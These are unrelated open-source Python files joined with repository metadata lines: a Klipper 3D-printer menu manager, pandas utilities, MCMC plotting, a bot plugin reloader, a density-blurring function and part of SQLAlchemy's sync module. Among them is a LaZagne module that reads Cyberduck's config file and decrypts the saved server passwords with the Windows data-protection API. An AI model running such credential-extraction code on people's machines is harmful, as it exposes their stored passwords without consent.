menu_items = {
'disabled': MenuDisabled,
'command': MenuCommand,
'input': MenuInput,
'list': MenuList,
'vsdlist': MenuVSDList
}
TIMER_DELAY = 1.0
class MenuManager:
def __init__(self, config, display):
self.running = False
self.menuitems = {}
self.menustack = []
self.children = {}
self.display = display
self.printer = config.get_printer()
self.pconfig = self.printer.lookup_object('configfile')
self.gcode = self.printer.lookup_object('gcode')
self.gcode_queue = []
self.context = {}
self.root = None
self._root = config.get('menu_root', '__main')
self.cols, self.rows = self.display.get_dimensions()
self.timeout = config.getint('menu_timeout', 0)
self.timer = 0
# reverse container navigation
self._reverse_navigation = config.getboolean(
'menu_reverse_navigation', False)
# load printer objects
self.gcode_macro = self.printer.load_object(config, 'gcode_macro')
# register itself for printer callbacks
self.printer.add_object('menu', self)
self.printer.register_event_handler("klippy:ready", self.handle_ready)
# register for key events
menu_keys.MenuKeys(config, self.key_event)
# Load local config file in same directory as current module
self.load_config(os.path.dirname(__file__), 'menu.cfg')
# Load items from main config
self.load_menuitems(config)
# Load menu root
self.root = self.lookup_menuitem(self._root)
# send init event
self.send_event('init', self)
def handle_ready(self):
# start timer
reactor = self.printer.get_reactor()
reactor.register_timer(self.timer_event, reactor.NOW)
def timer_event(self, eventtime):
self.timeout_check(eventtime)
return eventtime + TIMER_DELAY
def timeout_check(self, eventtime):
if (self.is_running() and self.timeout > 0
and isinstance(self.root, MenuContainer)):
if self.timer >= self.timeout:
self.exit()
else:
self.timer += 1
else:
self.timer = 0
def send_event(self, event, *args):
return self.printer.send_event("menu:" + str(event), *args)
def is_running(self):
return self.running
def begin(self, eventtime):
self.menustack = []
self.timer = 0
if isinstance(self.root, MenuContainer):
# send begin event
self.send_event('begin', self)
self.update_context(eventtime)
if isinstance(self.root, MenuContainer):
self.root.init_selection()
self.stack_push(self.root)
self.running = True
return
elif self.root is not None:
logging.error("Invalid root, menu stopped!")
self.running = False
def get_status(self, eventtime):
return {
'timeout': self.timeout,
'running': self.running,
'rows': self.rows,
'cols': self.cols
}
def _action_back(self, force=False, update=True):
self.back(force, update)
return ""
def _action_exit(self, force=False):
self.exit(force)
return ""
def get_context(self, cxt=None):
context = dict(self.context)
if isinstance(cxt, dict):
context.update(cxt)
return context
def update_context(self, eventtime):
# menu default jinja2 context
self.context = self.gcode_macro.create_template_context(eventtime)
self.context['menu'] = {
'eventtime': eventtime,
'back': self._action_back,
'exit': self._action_exit
}
def stack_push(self, container):
if not isinstance(container, MenuContainer):
raise error("Wrong type, expected MenuContainer")
container.populate()
top = self.stack_peek()
if top is not None:
if isinstance(top, MenuList):
top.run_script('leave')
if isinstance(container, MenuList):
container.run_script('enter')
if not container.is_editing():
container.update_items()
container.init_selection()
self.menustack.append(container)
def stack_pop(self, update=True):
container = None
if self.stack_size() > 0:
container = self.menustack.pop()
if not isinstance(container, MenuContainer):
raise error("Wrong type, expected MenuContainer")
top = self.stack_peek()
if top is not None:
if not isinstance(container, MenuContainer):
raise error("Wrong type, expected MenuContainer")
if not top.is_editing() and update is True:
top.update_items()
top.init_selection()
if isinstance(container, MenuList):
container.run_script('leave')
if isinstance(top, MenuList):
top.run_script('enter')
else:
if isinstance(container, MenuList):
container.run_script('leave')
return container
def stack_size(self):
return len(self.menustack)
def stack_peek(self, lvl=0):
container = None
if self.stack_size() > lvl:
container = self.menustack[self.stack_size() - lvl - 1]
return container
def screen_update_event(self, eventtime):
# screen update
if not self.is_running():
return False
# draw menu
self.update_context(eventtime)
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
container.heartbeat(eventtime)
container.draw_container(self.rows, eventtime)
return True
def up(self, fast_rate=False):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuInput) and current.is_editing():
current.dec_value(fast_rate)
else:
if self._reverse_navigation is True:
container.select_next() # reverse
else:
container.select_prev() # normal
def down(self, fast_rate=False):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuInput) and current.is_editing():
current.inc_value(fast_rate)
else:
if self._reverse_navigation is True:
container.select_prev() # reverse
else:
container.select_next() # normal
def back(self, force=False, update=True):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuInput) and current.is_editing():
if force is True:
current.stop_editing()
else:
return
parent = self.stack_peek(1)
if isinstance(parent, MenuContainer):
self.stack_pop(update)
index = parent.index_of(container, True)
if index is not None:
parent.select_at(index)
elif parent.selected_item() is None:
parent.init_selection()
else:
self.stack_pop()
self.running = False
def exit(self, force=False):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if (not force and isinstance(current, MenuInput)
and current.is_editing()):
return
if isinstance(container, MenuList):
container.run_script('leave')
self.send_event('exit', self)
self.running = False
def push_container(self, menu):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
if (isinstance(menu, MenuContainer)
and not container.is_editing()
and menu is not container):
self.stack_push(menu)
return True
return False
def press(self, event='click'):
container = self.stack_peek()
if self.running and isinstance(container, MenuContainer):
self.timer = 0
current = container.selected_item()
if isinstance(current, MenuContainer):
self.stack_push(current)
elif isinstance(current, MenuInput):
if current.is_editing():
current.run_script('gcode', event=event)
current.run_script(event)
elif isinstance(current, MenuCommand):
current.run_script('gcode', event=event)
current.run_script(event)
else:
# current is None, no selection. passthru to container
container.run_script(event)
def queue_gcode(self, script):
if not script:
return
if not self.gcode_queue:
reactor = self.printer.get_reactor()
reactor.register_callback(self.dispatch_gcode)
self.gcode_queue.append(script)
def dispatch_gcode(self, eventtime):
while self.gcode_queue:
script = self.gcode_queue[0]
try:
self.gcode.run_script(script)
except Exception:
logging.exception("Script running error")
self.gcode_queue.pop(0)
def menuitem_from(self, type, **kwargs):
if type not in menu_items:
raise error("Choice '%s' for option '%s'"
" is not a valid choice" % (type, menu_items))
return menu_items[type](self, None, **kwargs)
def add_menuitem(self, name, item):
existing_item = False
if name in self.menuitems:
existing_item = True
logging.info(
"Declaration of '%s' hides "
"previous menuitem declaration" % (name,))
self.menuitems[name] = item
if isinstance(item, MenuElement):
parent = item.get_ns('..')
if parent and not existing_item:
if item.index is not None:
self.children.setdefault(parent, []).insert(
item.index, item.get_ns())
else:
self.children.setdefault(parent, []).append(
item.get_ns())
def lookup_menuitem(self, name, default=sentinel):
if name is None:
return None
if name in self.menuitems:
return self.menuitems[name]
if default is sentinel:
raise self.printer.config_error(
"Unknown menuitem '%s'" % (name,))
return default
def lookup_children(self, ns):
if ns in self.children:
return list(self.children[ns])
return list()
def load_config(self, *args):
cfg = None
filename = os.path.join(*args)
try:
cfg = self.pconfig.read_config(filename)
except Exception:
raise self.printer.config_error(
"Cannot load config '%s'" % (filename,))
if cfg:
self.load_menuitems(cfg)
return cfg
def load_menuitems(self, config):
for cfg in config.get_prefix_sections('menu '):
type = cfg.get('type')
if type not in menu_items:
raise error("Choice '%s' for option '%s'"
" is not a valid choice" % (type, menu_items))
item = menu_items[type](self, cfg)
self.add_menuitem(item.get_ns(), item)
def _click_callback(self, eventtime, event):
if self.is_running():
self.press(event)
else:
# lets start and populate the menu items
self.begin(eventtime)
def key_event(self, key, eventtime):
if key == 'click':
self._click_callback(eventtime, key)
elif key == 'long_click':
self._click_callback(eventtime, key)
elif key == 'up':
self.up(False)
elif key == 'fast_up':
self.up(True)
elif key == 'down':
self.down(False)
elif key == 'fast_down':
self.down(True)
elif key == 'back':
self.back()
self.display.request_redraw()
# Collection of manager class helper methods
@classmethod
def stripliterals(cls, s):
"""Literals are beginning or ending by the double or single quotes"""
s = str(s)
if (s.startswith('"') and s.endswith('"')) or \
(s.startswith("'") and s.endswith("'")):
s = s[1:-1]
return s
@classmethod
def aslatin(cls, s):
if isinstance(s, str):
return s
elif isinstance(s, unicode):
return unicode(s).encode('latin-1', 'ignore')
else:
return str(s)
@classmethod
def asflat(cls, s):
return cls.stripliterals(''.join(cls.aslatin(s).splitlines()))
| gpl-3.0 | -7,977,170,827,967,675,000 | 33.092784 | 79 | 0.546114 | false |
nelango/ViralityAnalysis | model/lib/pandas/tools/util.py | 9 | 2780 | import numpy as np
import pandas.lib as lib
import pandas as pd
from pandas.compat import reduce
from pandas.core.index import Index
from pandas.core import common as com
def match(needles, haystack):
haystack = Index(haystack)
needles = Index(needles)
return haystack.get_indexer(needles)
def cartesian_product(X):
'''
Numpy version of itertools.product or pandas.compat.product.
Sometimes faster (for large inputs)...
Examples
--------
>>> cartesian_product([list('ABC'), [1, 2]])
[array(['A', 'A', 'B', 'B', 'C', 'C'], dtype='|S1'),
array([1, 2, 1, 2, 1, 2])]
'''
lenX = np.fromiter((len(x) for x in X), dtype=int)
cumprodX = np.cumproduct(lenX)
a = np.roll(cumprodX, 1)
a[0] = 1
b = cumprodX[-1] / cumprodX
return [np.tile(np.repeat(np.asarray(com._values_from_object(x)), b[i]),
np.product(a[i]))
for i, x in enumerate(X)]
def _compose2(f, g):
"""Compose 2 callables"""
return lambda *args, **kwargs: f(g(*args, **kwargs))
def compose(*funcs):
"""Compose 2 or more callables"""
assert len(funcs) > 1, 'At least 2 callables must be passed to compose'
return reduce(_compose2, funcs)
def to_numeric(arg, errors='raise'):
"""
Convert argument to a numeric type.
Parameters
----------
arg : list, tuple or array of objects, or Series
errors : {'ignore', 'raise', 'coerce'}, default 'raise'
- If 'raise', then invalid parsing will raise an exception
- If 'coerce', then invalid parsing will be set as NaN
- If 'ignore', then invalid parsing will return the input
Returns
-------
ret : numeric if parsing succeeded.
Return type depends on input. Series if Series, otherwise ndarray
Examples
--------
Take separate series and convert to numeric, coercing when told to
>>> import pandas as pd
>>> s = pd.Series(['1.0', '2', -3])
>>> pd.to_numeric(s)
>>> s = pd.Series(['apple', '1.0', '2', -3])
>>> pd.to_numeric(s, errors='ignore')
>>> pd.to_numeric(s, errors='coerce')
"""
index = name = None
if isinstance(arg, pd.Series):
index, name = arg.index, arg.name
elif isinstance(arg, (list, tuple)):
arg = np.array(arg, dtype='O')
conv = arg
arg = com._ensure_object(arg)
coerce_numeric = False if errors in ('ignore', 'raise') else True
try:
conv = lib.maybe_convert_numeric(arg,
set(),
coerce_numeric=coerce_numeric)
except:
if errors == 'raise':
raise
if index is not None:
return pd.Series(conv, index=index, name=name)
else:
return conv
| mit | 7,139,247,261,411,718,000 | 25.730769 | 76 | 0.576978 | false |
jspilker/visilens | visilens/triangleplot.py | 1 | 8939 | import matplotlib.pyplot as pl; pl.ioff()
import matplotlib.cm as cm
from matplotlib.ticker import MaxNLocator
import scipy.ndimage
import numpy as np
import re
import copy
__all__ = ['TrianglePlot_MCMC','marginalize_2d','marginalize_1d']
def TrianglePlot_MCMC(mcmcresult,plotmag=True,plotnuisance=False):
"""
Script to plot the usual triangle degeneracies.
Inputs:
mcmcresult:
The result of running the LensModelMCMC routine. We
can figure out everything we need from there.
plotmag:
Whether to show the dependence of magnification on the other
parameters (it's derived, not a fit param).
plotnuisance:
Whether to additionally plot various nuisance parameters, like
the absolute location of the lens or dataset amp scalings or
phase shifts.
Returns:
f,axarr:
A matplotlib.pyplot Figure object and array of Axes objects, which
can then be manipulated elsewhere. The goal is to send something
that looks pretty good, but this is useful for fine-tuning.
"""
# List of params we'll call "nuisance"
nuisance = ['xL','yL','ampscale_dset','astromshift_x_dset','astromshift_y_dset']
allcols = list(mcmcresult['chains'].dtype.names)
# Gets rid of mag for unlensed sources, which is always 1.
allcols = [col for col in allcols if not ('mu' in col and np.allclose(mcmcresult['chains'][col],1.))]
if not plotmag: allcols = [x for x in allcols if not 'mu' in x]
if not plotnuisance: allcols = [x for x in allcols if not any([l in x for l in nuisance])]
labelmap = {'xL':'$x_{L}$, arcsec','yL':'$y_{L}$, arcsec','ML':'$M_{L}$, $10^{11} M_\odot$',\
'eL':'$e_{L}$','PAL':'$\\theta_{L}$, deg CCW from E','xoffS':'$\Delta x_{S}$, arcsec','yoffS':'$\Delta y_{S}$, arcsec',\
'fluxS':'$F_{S}$, mJy','widthS':'$\sigma_{S}$, arcsec','majaxS':'$a_{S}$, arcsec',\
'indexS':'$n_{S}$','axisratioS':'$b_{S}/a_{S}$','PAS':'$\phi_{S}$, deg CCW from E',\
'shear':'$\gamma$','shearangle':'$\\theta_\gamma$',
'mu':'$\mu_{}$','ampscale_dset':'$A_{}$',
'astromshift_x_dset':'$\delta x_{}$, arcsec','astromshift_y_dset':'$\delta y_{}$, arcsec'}
f,axarr = pl.subplots(len(allcols),len(allcols),figsize=(len(allcols)*3,len(allcols)*3))
axarr[0,-1].text(-0.8,0.9,'Chain parameters:',fontsize='xx-large',transform=axarr[0,-1].transAxes)
it = 0.
for row,yax in enumerate(allcols):
for col,xax in enumerate(allcols):
x,y = copy.deepcopy(mcmcresult['chains'][xax]), copy.deepcopy(mcmcresult['chains'][yax])
if 'ML' in xax: x /= 1e11 # to 1e11Msun from Msun
if 'ML' in yax: y /= 1e11
if 'fluxS' in xax: x *= 1e3 # to mJy from Jy
if 'fluxS' in yax: y *= 1e3
# Figure out the axis labels...
if xax[-1].isdigit():
digit = re.search(r'\d+$',xax).group()
xlab = (digit+'}$').join(labelmap[xax[:-len(digit)]].split('}$'))
else: xlab = labelmap[xax]
if yax[-1].isdigit():
digit = re.search(r'\d+$',yax).group()
ylab = (digit+'}$').join(labelmap[yax[:-len(digit)]].split('}$'))
else: ylab = labelmap[yax]
# To counter outlying walkers stuck in regions of low likelihood, we use percentiles
# instead of std().
xstd = np.ediff1d(np.percentile(x,[15.87,84.13]))[0]/2.
ystd = np.ediff1d(np.percentile(y,[15.87,84.13]))[0]/2.
xmin,xmax = np.median(x)-8*xstd, np.median(x)+8*xstd
ymin,ymax = np.median(y)-8*ystd, np.median(y)+8*ystd
if row > col:
try: marginalize_2d(x,y,axarr[row,col],\
extent=[xmin,xmax,ymin,ymax],bins=int(max(np.floor(x.size/1000),50)))
except ValueError: print(xax,yax); raise ValueError("One of the columns has no dynamic range.")
if col > 0: pl.setp(axarr[row,col].get_yticklabels(),visible=False)
else: axarr[row,col].set_ylabel(ylab,fontsize='x-large')
if row<len(allcols)-1: pl.setp(axarr[row,col].get_xticklabels(),visible=False)
else: axarr[row,col].set_xlabel(xlab,fontsize='x-large')
axarr[row,col].xaxis.set_major_locator(MaxNLocator(5))
axarr[row,col].yaxis.set_major_locator(MaxNLocator(5))
elif row == col:
marginalize_1d(x,axarr[row,col],extent=[xmin,xmax],\
bins=int(max(np.floor(x.size/1000),50)))
if row<len(allcols)-1: axarr[row,col].set_xlabel(xlab,fontsize='x-large')
if col<len(allcols)-1: pl.setp(axarr[row,col].get_xticklabels(),visible=False)
axarr[row,col].xaxis.set_major_locator(MaxNLocator(5))
#axarr[row,col].yaxis.set_major_locator(MaxNLocator(5))
else:
if not (row==0 and col==len(allcols)): axarr[row,col].set_axis_off()
axarr[0,-1].text(-0.8,0.7-it,'{0:10s} = {1:.3f} $\pm$ {2:.3f}'.format(ylab,np.median(y),ystd),\
fontsize='xx-large',transform=axarr[0,-1].transAxes)
it += 0.2
axarr[0,-1].text(-0.8,0.7-it,'DIC = {0:.0f}'.format(mcmcresult['best-fit']['DIC']),fontsize='xx-large',\
transform=axarr[0,-1].transAxes)
f.subplots_adjust(hspace=0,wspace=0)
return f,axarr
def marginalize_2d(x,y,axobj,*args,**kwargs):
"""
Routine to plot 2D confidence intervals between two parameters given arrays
of MCMC samples.
Inputs:
x,y:
Arrays of MCMC chain values.
axobj:
A matplotlib Axes object on which to plot.
extent:
List of [xmin,xmax,ymin,ymax] values to be used as plot axis limits
bins:
Number of bins to put the chains into.
levs:
Contour levels, in sigma.
"""
# Get values of various possible kwargs
bins = int(kwargs.pop('bins',50))
levs = kwargs.pop('levs',[1.,2.,3.])
extent = kwargs.pop('extent',[x.min(),x.max(),y.min(),y.max()])
cmap = kwargs.pop('cmap','Greys')
cmap = cm.get_cmap(cmap.capitalize())
cmap = cmap(np.linspace(0,1,np.asarray(levs).size))
#cmap._init()
#cmap._lut[:-3,:-1] = 0.
#cmap._lut[:-3,-1] = np.linspace(1,0,cmap.N)
#colorlevs = ([200./256]*3,[80./256]*3,[12./256]*3)
Xbins = np.linspace(extent[0],extent[1],bins+1)
Ybins = np.linspace(extent[2],extent[3],bins+1)
# Bin up the samples. Will fail if x or y has no dynamic range
try:
H,X,Y = np.histogram2d(x.flatten(),y.flatten(),bins=(Xbins,Ybins))
except ValueError: return ValueError("One of your columns has no dynamic range... check it.")
# Generate contour levels, sort probabilities from most to least likely
V = 1.0 - np.exp(-0.5*np.asarray(levs)**2.)
H = scipy.ndimage.filters.gaussian_filter(H,np.log10(x.size))
Hflat = H.flatten()
inds = np.argsort(Hflat)[::-1]
Hflat = Hflat[inds]
sm = np.cumsum(Hflat)
sm /= sm[-1]
# Find the probability levels that encompass each sigma's worth of likelihood
for i,v0 in enumerate(V):
try: V[i] = Hflat[sm <= v0][-1]
except: V[i] = Hflat[0]
V = V[::-1]
clevs = np.append(V,Hflat.max())
X1, Y1 = 0.5*(X[1:] + X[:-1]), 0.5*(Y[1:]+Y[:-1])
if kwargs.get('plotfilled',True): axobj.contourf(X1,Y1,H.T,clevs,colors=cmap)
axobj.contour(X1,Y1,H.T,clevs,colors=kwargs.get('colors','k'),linewidths=kwargs.get('linewidths',1.5),\
linestyles=kwargs.get('linestyles','solid'))
axobj.set_xlim(extent[0],extent[1])
axobj.set_ylim(extent[2],extent[3])
def marginalize_1d(x,axobj,*args,**kwargs):
"""
Plot a histogram of x, with a few tweaks for corner plot pleasantry.
Inputs:
x:
Array of MCMC samples to plot up.
axobj:
Axes object on which to plot.
"""
bins = int(kwargs.pop('bins',50))
extent = kwargs.pop('extent',[x.min(),x.max()])
fillcolor = kwargs.pop('color','gray')
#X = scipy.ndimage.filters.gaussian_filter(x,np.log10(x.size))
axobj.hist(x,bins=bins,range=extent,histtype='stepfilled',color=fillcolor)
axobj.yaxis.tick_right()
pl.setp(axobj.get_yticklabels(),visible=False)
axobj.set_xlim(extent[0],extent[1])
| mit | 3,057,328,484,673,881,600 | 43.695 | 132 | 0.553194 | false |
TeamPeggle/ppp-helpdesk | core/reload.py | 2 | 5214 | from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
import collections
import glob
import os
import re
import sys
import traceback
if 'mtimes' not in globals():
mtimes = {}
if 'lastfiles' not in globals():
lastfiles = set()
def make_signature(f):
return f.__code__.co_filename, f.__name__, f.__code__.co_firstlineno
def format_plug(plug, kind='', lpad=0, width=40):
out = ' ' * lpad + '%s:%s:%s' % make_signature(plug[0])
if kind == 'command':
out += ' ' * (50 - len(out)) + plug[1]['name']
if kind == 'event':
out += ' ' * (50 - len(out)) + ', '.join(plug[1]['events'])
if kind == 'regex':
out += ' ' * (50 - len(out)) + plug[1]['regex']
return out
def reload(init=False):
changed = False
if init:
bot.plugs = collections.defaultdict(list)
bot.threads = {}
core_fileset = set(glob.glob(os.path.join("core", "*.py")))
for filename in core_fileset:
mtime = os.stat(filename).st_mtime
if mtime != mtimes.get(filename):
mtimes[filename] = mtime
changed = True
try:
eval(compile(open(filename, 'r').read(), filename, 'exec'),
globals())
except Exception:
traceback.print_exc()
if init: # stop if there's an error (syntax?) in a core
sys.exit() # script on startup
continue
if filename == os.path.join('core', 'reload.py'):
reload(init=init)
return
fileset = set(glob.glob(os.path.join('plugins', '*.py')))
# remove deleted/moved plugins
for name, data in bot.plugs.items():
bot.plugs[name] = [x for x in data if x[0]._filename in fileset]
for filename in list(mtimes):
if filename not in fileset and filename not in core_fileset:
mtimes.pop(filename)
for func, handler in list(bot.threads.items()):
if func._filename not in fileset:
handler.stop()
del bot.threads[func]
# compile new plugins
for filename in fileset:
mtime = os.stat(filename).st_mtime
if mtime != mtimes.get(filename):
mtimes[filename] = mtime
changed = True
try:
code = compile(open(filename, 'r').read(), filename, 'exec')
namespace = {}
eval(code, namespace)
except Exception:
traceback.print_exc()
continue
# remove plugins already loaded from this filename
for name, data in bot.plugs.items():
bot.plugs[name] = [x for x in data
if x[0]._filename != filename]
for func, handler in list(bot.threads.items()):
if func._filename == filename:
handler.stop()
del bot.threads[func]
for obj in namespace.values():
if hasattr(obj, '_hook'): # check for magic
if obj._thread:
bot.threads[obj] = Handler(obj)
for type, data in obj._hook:
bot.plugs[type] += [data]
if not init:
print('### new plugin (type: %s) loaded:' % \
type, format_plug(data))
if changed:
bot.commands = {}
for plug in bot.plugs['command']:
name = plug[1]['name'].lower()
if not re.match(r'^\w+$', name):
print('### ERROR: invalid command name "%s" (%s)' % (name,
format_plug(plug)))
continue
if name in bot.commands:
print("### ERROR: command '%s' already registered (%s, %s)" % \
(name, format_plug(bot.commands[name]),
format_plug(plug)))
continue
bot.commands[name] = plug
bot.events = collections.defaultdict(list)
for func, args in bot.plugs['event']:
for event in args['events']:
bot.events[event].append((func, args))
if init:
print(' plugin listing:')
if bot.commands:
# hack to make commands with multiple aliases
# print nicely
print(' command:')
commands = collections.defaultdict(list)
for name, (func, args) in bot.commands.items():
commands[make_signature(func)].append(name)
for sig, names in sorted(commands.items()):
names.sort(key=lambda x: (-len(x), x)) # long names first
out = ' ' * 6 + '%s:%s:%s' % sig
out += ' ' * (50 - len(out)) + ', '.join(names)
print(out)
for kind, plugs in sorted(bot.plugs.items()):
if kind == 'command':
continue
print(' %s:' % kind)
for plug in plugs:
print(format_plug(plug, kind=kind, lpad=6))
print()
| unlicense | 5,963,575,439,260,024,000 | 30.6 | 88 | 0.493479 | false |
kjohnsson/modality | modality/util/frequency_polygon_blurring.py | 1 | 2765 | from __future__ import unicode_literals
import numpy as np
def sample_linear_density(nsamp, x0, w, y0, y1):
'''
Input:
nsamp - number of samples
x0 - left boundary
w - interval length
y0 - density at left boundary
y1 - density at right boundary
'''
m = y0
k = y1-y0
u = np.random.rand(nsamp)
if k != 0:
q = m/k
return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0
return u*w + x0
def evenly_spaced_linear_density(nsamp, x0, w, y0, y1):
'''
Input:
nsamp - number of samples
x0 - left boundary
w - interval length
y0 - density at left boundary
y1 - density at right boundary
'''
m = y0
k = y1-y0
u = np.linspace(0, 1, nsamp, endpoint=False)
if k != 0:
q = m/k
return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0
return u*w + x0
def fp_blurring(data, w, even_spaced=False):
'''
Blurs data using the frequency polygon. Data is assumed to
be binned with bin width w. Purpose of blurring is to counter
effect of truncation. When even_spaced is True, the blurred data
is put in a deterministic way according to the density, when
False it is sampled from the density.
Ref: Minnotte (1997): Nonparametric Testing of Existence of Modes.
Input:
data - data set (one-dimensional)
w - bin width
'''
y, x = np.histogram(data, bins=np.arange(min(data)-0.5*w, max(data)+1.5*w, w))
y_count = np.hstack([[0], y, [0]])
x_fp = np.zeros(2*len(x)-1)
x_fp[0::2] = x
x_fp[1::2] = (x[1:]+x[:-1])/2
y_fp = np.zeros(2*len(x)-1)
y_fp[1::2] = y
y_fp[::2] = (y_count[1:]+y_count[:-1])*1./2
n_fp = np.zeros(2*len(y), dtype=np.int)
p_left = (y_count[:-2] + 3*y_count[1:-1])*1./(y_count[:-2] + 6*y_count[1:-1] + y_count[2:])
p_left[np.isnan(p_left)] = 0
if not even_spaced:
n_fp[0::2] = np.random.binomial(y, p_left)
else:
n_fp[0::2] = np.round(y*p_left)
n_fp[1::2] = y - n_fp[0::2]
data_fp = []
for n, x0, y0, y1 in zip(n_fp, x_fp[:-1], y_fp[:-1], y_fp[1:]):
if not even_spaced:
data_fp.append(sample_linear_density(n, x0, w*0.5, y0, y1))
else:
data_fp.append(evenly_spaced_linear_density(n, x0, w*0.5, y0, y1))
data_blurred = data.copy().astype(np.float)
for i, (x0, x1) in enumerate(zip(x[:-1], x[1:])):
ind = (data >= x0)*(data < x1)
if len(ind) > 0:
data_blurred[ind] = np.hstack(data_fp[(2*i):(2*i+2)])
return data_blurred
| mit | -5,759,943,636,172,562,000 | 31.529412 | 95 | 0.510307 | false |
Endika/LaZagne | Windows/src/LaZagne/softwares/sysadmin/cyberduck.py | 11 | 2264 | import sqlite3
import win32crypt
import sys, os, platform, base64
import xml.etree.cElementTree as ET
from config.write_output import print_output, print_debug
from config.constant import *
from config.header import Header
from config.moduleInfo import ModuleInfo
class Cyberduck(ModuleInfo):
def __init__(self):
options = {'command': '-c', 'action': 'store_true', 'dest': 'cyberduck', 'help': 'cyberduck'}
ModuleInfo.__init__(self, 'cyberduck', 'sysadmin', options)
# find the user.config file containing passwords
def get_path(self):
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Cyberduck'
if os.path.exists(directory):
for dir in os.listdir(directory):
if dir.startswith('Cyberduck'):
for d in os.listdir(directory + os.sep + dir):
path = directory + os.sep + dir + os.sep + d + os.sep + 'user.config'
if os.path.exists(path):
return path
return 'User_profil_not_found'
else:
return 'CYBERDUCK_NOT_EXISTS'
else:
return 'APPDATA_NOT_FOUND'
# parse the xml file
def parse_xml(self, xml_file):
tree = ET.ElementTree(file=xml_file)
pwdFound = []
for elem in tree.iter():
values = {}
try:
if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') or elem.attrib['name'].startswith('https'):
values['URL'] = elem.attrib['name']
encrypted_password = base64.b64decode(elem.attrib['value'])
password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
values['Password'] = password
pwdFound.append(values)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Cyberduck", pwdFound)
# main function
def run(self):
# print title
Header().title_info('Cyberduck')
path = self.get_path()
if path == 'CYBERDUCK_NOT_EXISTS':
print_debug('INFO', 'Cyberduck not installed.')
elif path == 'User_profil_not_found':
print_debug('INFO', 'User profil has not been found.')
elif path == 'APPDATA_NOT_FOUND':
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
else:
self.parse_xml(path)
| lgpl-3.0 | -8,486,084,563,818,609,000 | 31.826087 | 214 | 0.670053 | false |
williamfeng323/py-web | flask/lib/python3.6/site-packages/sqlalchemy/orm/sync.py | 33 | 5451 | # orm/sync.py
# Copyright (C) 2005-2017 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""private module containing functions used for copying data
between instances based on join conditions.
"""
from . import exc, util as orm_util, attributes
def populate(source, source_mapper, dest, dest_mapper,
synchronize_pairs, uowcommit, flag_cascaded_pks):
source_dict = source.dict
dest_dict = dest.dict
for l, r in synchronize_pairs:
try:
# inline of source_mapper._get_state_attr_by_column
prop = source_mapper._columntoproperty[l]
value = source.manager[prop.key].impl.get(source, source_dict,
attributes.PASSIVE_OFF)
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, dest_mapper, r)
try:
# inline of dest_mapper._set_state_attr_by_column
prop = dest_mapper._columntoproperty[r]
dest.manager[prop.key].impl.set(dest, dest_dict, value, None)
except exc.UnmappedColumnError:
_raise_col_to_prop(True, source_mapper, l, dest_mapper, r)
# technically the "r.primary_key" check isn't
# needed here, but we check for this condition to limit
# how often this logic is invoked for memory/performance
# reasons, since we only need this info for a primary key
# destination.
if flag_cascaded_pks and l.primary_key and \
r.primary_key and \
r.references(l):
uowcommit.attributes[("pk_cascaded", dest, r)] = True
def bulk_populate_inherit_keys(
source_dict, source_mapper, synchronize_pairs):
# a simplified version of populate() used by bulk insert mode
for l, r in synchronize_pairs:
try:
prop = source_mapper._columntoproperty[l]
value = source_dict[prop.key]
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, source_mapper, r)
try:
prop = source_mapper._columntoproperty[r]
source_dict[prop.key] = value
except exc.UnmappedColumnError:
_raise_col_to_prop(True, source_mapper, l, source_mapper, r)
def clear(dest, dest_mapper, synchronize_pairs):
for l, r in synchronize_pairs:
if r.primary_key and \
dest_mapper._get_state_attr_by_column(
dest, dest.dict, r) not in orm_util._none_set:
raise AssertionError(
"Dependency rule tried to blank-out primary key "
"column '%s' on instance '%s'" %
(r, orm_util.state_str(dest))
)
try:
dest_mapper._set_state_attr_by_column(dest, dest.dict, r, None)
except exc.UnmappedColumnError:
_raise_col_to_prop(True, None, l, dest_mapper, r)
def update(source, source_mapper, dest, old_prefix, synchronize_pairs):
for l, r in synchronize_pairs:
try:
oldvalue = source_mapper._get_committed_attr_by_column(
source.obj(), l)
value = source_mapper._get_state_attr_by_column(
source, source.dict, l, passive=attributes.PASSIVE_OFF)
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, None, r)
dest[r.key] = value
dest[old_prefix + r.key] = oldvalue
def populate_dict(source, source_mapper, dict_, synchronize_pairs):
for l, r in synchronize_pairs:
try:
value = source_mapper._get_state_attr_by_column(
source, source.dict, l, passive=attributes.PASSIVE_OFF)
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, None, r)
dict_[r.key] = value
def source_modified(uowcommit, source, source_mapper, synchronize_pairs):
"""return true if the source object has changes from an old to a
new value on the given synchronize pairs
"""
for l, r in synchronize_pairs:
try:
prop = source_mapper._columntoproperty[l]
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, None, r)
history = uowcommit.get_attribute_history(
source, prop.key, attributes.PASSIVE_NO_INITIALIZE)
if bool(history.deleted):
return True
else:
return False
def _raise_col_to_prop(isdest, source_mapper, source_column,
dest_mapper, dest_column):
if isdest:
raise exc.UnmappedColumnError(
"Can't execute sync rule for "
"destination column '%s'; mapper '%s' does not map "
"this column. Try using an explicit `foreign_keys` "
"collection which does not include this column (or use "
